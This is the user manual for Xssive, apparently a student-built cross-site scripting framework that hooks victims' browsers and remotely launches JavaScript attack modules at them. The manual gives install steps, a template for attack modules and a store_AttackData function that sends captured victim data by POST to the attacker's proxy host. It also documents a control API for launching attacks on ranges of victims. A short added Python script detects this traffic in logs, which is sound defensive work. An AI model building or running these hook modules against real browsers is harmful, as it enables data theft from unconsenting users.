__  __        _
\ \/ /___ ___(_)_   _____
 \  // __/ __| \ \ / / _ \
 /  \\__ \__ \ |\ V /  __/
/_/\_\___/___/_| \_/ \___|
Demonstration Framework 0.1

What is it? - ( Xssive.tar.gz )

The Xssive Framework is a tool written in Python that not only
demonstrates cross-site scripting vulnerabilities but also allows a security
professional to easily manage and launch escalated attacks on multiple
different hooked targets simultaneously. This tool was developed using
web.py, a minimalist Python-based web framework. All of the libraries I
used in development are free and open source.

There are many tools out there that use similar techniques, and most of them
are better. I aimed to allow multiple different interfaces to take advantage of this
tool, such as a web page, IRC bot, or a terminal-based tool. It would also allow for
simultaneous control by multiple different parties at once.
This tool was developed as a 3rd year project in DCU.

I will eventually provide demonstrative videos.
As part of this project I have also written a terminal-based GUI control
device that allows this tool to be used. Below I provide installation
instructions and a general user manual.

#Library Installation
#Xssive Installation Guide
#Architectural overview
#Writing your own attack modules
#Control device interface
#Simple Example control device
#Xssive help options

Library Installation

web.py - ( http://webpy.org )
This is a simple, lightweight, standalone Python-based web framework. I
found it very easy to use and felt it would greatly suit the planned tool's
requirements. I had never used it before; the library's website was very
clear cut and contained many demonstrative examples.
Installation instructions - ( http://webpy.org/install )
I installed it on my Ubuntu 12.10 distribution using the following:
$ wget http://webpy.org/static/web.py-0.37.tar.gz
$ python setup.py install
The second command is run in the extracted folder.

Xssive Installation Guide

In order to use this tool you must have Python 2.7.3 installed. This tool was developed for Linux-based
operating systems; it could, however, be easily edited to function with other operating
systems.

Step 1: Firstly download the Xssive.tar.gz which is available at the following location:
https://makthepla.net/Xssive.tar.gz

Step 2: Then uncompress the gzip archive using the following command on Linux:
$ tar -zxvf Xssive.tar.gz

Step 3: Xssive.py is the main Xssive proxy server. It may be best to run this as root as it needs
to use web sockets. If not, create a user with the appropriate permissions. It can be started using
the following command:
$ sudo python Xssive.py

Step 4: When your tool is running you will be presented with the current host location/port and a
Control key (highlighted in red). This control key will be used by any control devices to interact
with the server.

Step 5: For a demonstration use the simple_control_device.py. The control device needs the
host location of the proxy server and the control key to be passed into it.
Troubleshooting: The demonstration control device uses the -H (host) value when creating the URLs, so make
sure the host does not end with a final /
$ python simple_control_device.py -H http://theXssiveProxyHost -K 17b573eada554ba3b0613eb418094cd4

Architectural Overview

These diagrams offer a very clear overview of how the project functions and operates. In (a)
below we can clearly see all of the architecture that is required for this tool to function.
(b) Represents the flow of Data between these devices.

a.Architecture involved.

b.Data Flow Diagram

Writing Attack Modules

One of the major benefits of having this XSS framework is that it makes it easier to write useful
JavaScript attack code. I provide brief instructions here on the items available to you, should you choose to
create some attack modules of your own. Place your modules in the modules folder. The general format for your
attack code should look like the following.

NOTE: It must contain the attack_module variable (name of js file) if you want to store data.

/*  Simple Prompt Module for Testing. */
var attack_module = 'alert.js';
//Malicious action here.
prompt(document.domain,'Xssive Framework 0.1');

//Store the attack data.
store_AttackData('Successful alert');

Useful available variables.

host_addr:  This contains the host IP of the proxy server.
victim_id:  This contains the unique Victim id for the browser you have hooked.
ctrl_key:   This contains the control API key that allows access to info or info storage.

Useful available functions.

store_AttackData(): This function proves very handy. I have included it in the hook code for use.
This will store whatever data you need in the attack_data database table. It creates the correct JSON format required by the Xssive server
to store attack information. It does this by performing a jQuery AJAX POST request to the proxy server, with the data stored inside.
It takes full advantage of the variables available above.

function store_AttackData(attdata){
    //Creating JSON
    var jsons = { att_data: [] };
    jsons.att_data.push ({
        "victimid": victim_id,
        "module": attack_module,
        "data": attdata
    });

The jQuery POST request looks like the following.

    $.ajax({ type: "POST", url: "http://"+host_addr+"/Data/"+ctrl_key,
        dataType: "json", data: JSON.stringify(jsons) ,
        success: function (data){
            var obj = $.parseJSON(data); //obj will contain response data.
        }
    });
}
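
Seen from the defending side, the request built above has a recognisable shape: a POST to /Data/<control key> whose body is an att_data list of victimid/module/data records, with the same key (an md5, so 32 hex characters) reused under /Command/ by control devices, as described under Control Device Interface. The following Python is an added example, not part of Xssive: it flags that traffic in proxy logs; the tab-separated log format, addresses and key are constructed for illustration.

```python
import json
import re
from urllib.parse import urlsplit

# URL shape documented on this page: /Data/<key> or /Command/<key>, where the
# control key is an md5 hex digest (32 hex characters).
XSSIVE_PATH = re.compile(r"^/(Data|Command)/([0-9a-fA-F]{32})/?$")
ATT_FIELDS = {"victimid", "module", "data"}  # keys built by store_AttackData()

def classify(method, url, body=""):
    """Return a finding for Xssive-shaped traffic, or None for anything else."""
    parts = urlsplit(url)
    m = XSSIVE_PATH.match(parts.path)
    if not m:
        return None
    endpoint = m.group(1)
    kind = "data_poll" if (method, endpoint) == ("GET", "Data") else "path_only"
    try:
        doc = json.loads(body) if method == "POST" and body else None
    except ValueError:
        doc = None
    if isinstance(doc, dict):
        recs = doc.get("att_data")
        if endpoint == "Data" and isinstance(recs, list) and recs and all(
                isinstance(r, dict) and ATT_FIELDS.issubset(r) for r in recs):
            kind = "attack_data_upload"   # a hooked browser reporting back
        elif endpoint == "Command" and "command" in doc:
            kind = "control_command"      # a control device issuing a command
    return {"server": parts.netloc, "endpoint": endpoint,
            "key": m.group(2).lower(), "kind": kind}

def scan(lines):
    """Scan 'client<TAB>method<TAB>url<TAB>body' lines (constructed log format)."""
    hits = []
    for line in lines:
        client, method, url, body = (line.rstrip("\n").split("\t") + [""] * 4)[:4]
        finding = classify(method, url, body)
        if finding:
            hits.append(dict(finding, client=client))
    return hits

KEY = "0123456789abcdef0123456789abcdef"  # constructed sample key
SAMPLE_LOG = [  # constructed sample traffic
    "10.0.0.21\tPOST\thttp://203.0.113.7/Data/" + KEY + '\t{"att_data": [{"victimid": 3, "module": "alert.js", "data": "Successful alert"}]}',
    "10.0.0.21\tGET\thttp://intranet.example/Data/report.csv\t",
    "10.0.0.40\tGET\thttp://203.0.113.7/Data/" + KEY + "\t",
    "10.0.0.40\tPOST\thttp://203.0.113.7/Command/" + KEY + '\t{"command": "List_Mod"}',
    "10.0.0.8\tGET\thttp://cdn.example/static/" + KEY + ".js\t",
]
```

A bare path match is reported as path_only, since unrelated applications can use similar URLs; the body checks are what tie a hit to the formats on this page.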

Control Device Interface


The control device could come in a variety of forms; all you need to be able to use this interface is to parse JSON from URLs or send JSON commands in a POST request.
It is essential for your control device to also be able to use the control key that is generated on starting the Xssive proxy server.
The control key is an md5 that is generated upon starting the server. You also need the address of your server, which is available through the same means.

Pulling JSON Victim Data: This information is available at the following url.

http://HOST/Data/ControlKey

There are two groups of data represented by the JSON. One is the "attack" information, which contains information that was retrieved in recent attacks.
The other is the "hooked" information, which includes all the data for victims currently hooked by your hook code.

Sending JSON Commands: It is possible to remotely send the Xssive server commands. 
These could come from curl requests or a control device you have created. The commands should be sent to the following address.

http://HOST/Command/ControlKey

There are various commands a control device can carry out. These commands are parsed from the following JSON format. 
JSON success or fail data will also be presented.

{
    "command":  "Launch"    - Launch an attack module. (This requires a victimid and a module name.)
                "List_Mod"  - This will return a JSON list of the attack modules.
                "Clear"     - This unhooks all victims.
                "Delete"    - Remove a loaded module. (This requires a victimid and a module name.)

    "victimid": 1           - Carry out attack on a single user.
                "0,4"       - Carry out attacks on a range of victims.

    "module":   "module.js" - The module to load.
}

Example Control Device

This control device is named simple_control_tool.py. It is included in the package.
It was the tool I made solely for testing purposes. Below you will see it is a very simple
terminal-based app.

This is the main menu.
This is an example of one of the sub-menus
The following is just an example of some capture data.

Help Options

There is a help menu available when you run the Xssive.py file which is the main server.
Use the -h argument. You will be presented with the following information.
Xssive Demonstration Framework

optional arguments:
    -h, --help          Show this help message and exit
    -p PORT             Specify a port.
    -H HOST             Specify where to run proxy server. Default is the current host.
    -v                  Display example injection vectors.
    -mysql DBINFO       Provide information for an external Database to use in the format  
                        "host,user,passwd,db". By default this tool will use a local SQLite database.
    -db FILE            Provide a named SQLite database to use.
    -page PAGE          Provide a webpage , the contents will be displayed at the 
                        /Page location.For use with attack code.